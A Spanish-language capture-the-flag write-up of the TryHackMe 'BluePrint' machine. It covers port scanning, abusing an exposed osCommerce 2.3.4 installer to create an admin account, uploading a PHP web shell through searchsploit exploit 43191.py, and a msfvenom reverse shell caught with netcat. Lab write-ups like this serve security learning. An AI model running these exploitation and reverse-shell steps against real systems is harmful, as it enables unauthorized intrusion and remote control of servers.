BluePrint – TryHackMe Write-Up

BluePrint – TryHackMe Write-Up

Hoy toca resolver la máquina BluePrint de TryHackMe, es una máquina de nivel fácil donde a través del reconocimiento veremos que hay un sistema para ecommerce el cual podemos manipular para gestionar un usuario administrador y, gracias a que el sistema esta muy desactualizado, podremos subir varias shells que nos permitirán el acceso como administrador al sistema.

Ip de la máquina en mi caso: 10.10.254.166

Dificultad asignada por la plataforma: Fácil

Reconocimiento

En primer lugar, lanzaré el rec0ldd sobre la máquina para detectar los puertos abiertos:

rec0ldd <ip>
clear ya funciona

Escaneo con rec0ldd

Ha detectado un montón de puertos, ya que están copiados en el portapapeles gracias a xclip, procedo a hacer un escaneo con nmap más en profundidad donde usaremos el parámetro -sC para lanzar scirpts predeterminados -sV para detectar las versiones de los servicios y -T4 para que vaya más rápido, casi tan rápido como lo que tardo ella en olvidarte:

nmap -sC -sV -T4 -p139,135,80,445,443,3306,8080,49152,49153,49154,49158,49160,49159 <ip>  -oN puertosAbiertos
clear ya funciona

Escaneo con nmap

Como verás hay un motón de información (lógicamente porque hay muchos puertos abiertos), lo que podemos ver que llama la atención es que estamos frente a un sistema Windows 7 Home, entonces ¿qué procede?, vemos que tenemos varios servicios http, en concreto el 8080 es un apache y aparentemente es al que podemos acceder sin problemas a priori, al entrar verás que tenemos un directorio que alberga un OsCommerce en su versión 2.3.4:

clear ya funciona

Reconocimiento web

Al entrar en dicho directorio vemos que nos encontramos con dos directorios más:

clear ya funciona

Detección de más directorios dentro de oscommerce

Al entrar en ellos, en concreto en “catalog” nos va a enviar al sitio web como tal, un sitio muy visual que se nota que se invirtió mucho tiempo y dinero en el frontend:

clear ya funciona

Página principal del CMS

Al ver el código fuente se puede observar que hay muchas referencias a localhost que, al entenderse ahora como localhost nuestro propio dispositivo, es muy normal que pase esto. Por otro lado, a resaltar más puntos es la versión de esta tecnología, 2.3.4, al hacer una búsqueda en searchsploit podemos ver que, hay muchos exploits disponibles:

clear ya funciona

Búsqueda con searchsploit

Pero antes de ver esto hay que hacer un poco más de reconocimiento ya que, conseguimos un sitio web, entonces, vamos a hacer lo propio, un buen fuzzing no le cae mal, así que como siempre, haremos uso de gobuster:

gobuster dir -u http://<ip>:8080/oscommerce-2.3.4/catalog/ -w /usr/share/wordlists/dirb/big.txt

Conseguimos un directorio nuevo llamado “install”:

clear ya funciona

Resultado de fuzzing con gobuster

Al entrar podemos ver que podemos configurar manualmente la base de datos del servidor de oscommerce, en dicho caso, rellenamos los campos como cualquier otra instalación:

clear ya funciona

Configuración de la nueva instalación

Luego de esto y de que la estructura de la base de datos se haya importado correctamente, podemos configurar las credenciales del administrador, yo le voy a poner “c0ldd” de usuario y contraseña:

clear ya funciona

Configuración de credenciales

Explotación

Al hacer todo esto, se me ocurre algo interesante que hacer con un exploit que vimos antes, en concreto el de subida arbitraria de ficheros, que, con el comando:

searchsploit -m 43191.py

Podemos copiarlo a nuestro directorio actual:

clear ya funciona

Copia de exploit a directorio actual

Bien, al ejecutarlo veremos que nos pide una serie de parámetros:

clear ya funciona

Parámetros a enviar 

Y aquí viene lo interesante, a través de una conexión estando ya autenticados (con las credenciales que pusimos antes), podremos subir un fichero, en este caso podemos subir mismamente una shell, entonces vamos a ello, primero nos creamos la shell en cuestión, nada del otro mundo, partimos del a función passthru que es una función que es parecida a exec que nos sirven para ejecutar programas externos:

clear ya funciona

La shell que usaremos (el nombre de la shell impone respeto)

Ahora con la shell creada, vamos a ejecutar el siguiente comando donde ya le mandamos todos los parámetros al exploit en cuestión:

python 43191.py -u http://10.10.254.166:8080/oscommerce-2.3.4 --auth=usuario:contraseña -f <nombre_de_la_shell>

Y al hacerlo logramos cargar la shell en el servidor:

clear ya funciona

Shell cargada

Ahora, si accedemos a la Shell y ejecutamos cualquier comando veremos que, efectivamente estamos en el sistema, de hecho, al hacer un whoami veremos que somos ya administradores en el Windows:

clear ya funciona

Shell funcionando

Bueno, en este punto para poder obtener una shell mucho mejor (que no sea por el navegador) podemos hacer uso de msfvenom para generarla, luego, mismo proceso, la cargamos y ejecutamos, pero en este caso debemos tener el oyente de netcat encendido, entonces, para crear la shell ejecutamos:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=31 -f exe> <nombre.exe>
clear ya funciona

Creación de reverse shell

Una vez hecho esto, lo mismo, la subimos:

clear ya funciona

Shell reversa subida

Seguidamente nos ponemos a la escucha en netcat en el puerto indicado en la shell:

clear ya funciona

netcat a la escucha

Llamamos a la shell y listo:

clear ya funciona

Conexión establecida con el sistema

Y ya estaría resuelta.

Calificación

  • Dificultad de acceso: 13% 13%

He hecho esta puntuación basándome en estos valores propios:

Fácil1% – 30%

Medio: 31% – 70%

Difícil: 71% – 100%

Sobre el Autor

C0ldd

Founder of Coldd Security

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Información adicional sobre protección de datos:
Responsable: Martin Frias.
Finalidad: Moderar los comentarios de este sitio web.
Cesión: NO se cederán a nadie, salvo obligación legal.
Derechos: Acceso, rectificación, cancelación y borrado de tus datos.
Legitimación: Tu consentido expreso.

Sponsor By

Coldd Security

REDES SOCIALES

Newsletter

Estadísticas

  • 86.609
  • 50

TheHackerSnow

0

Share This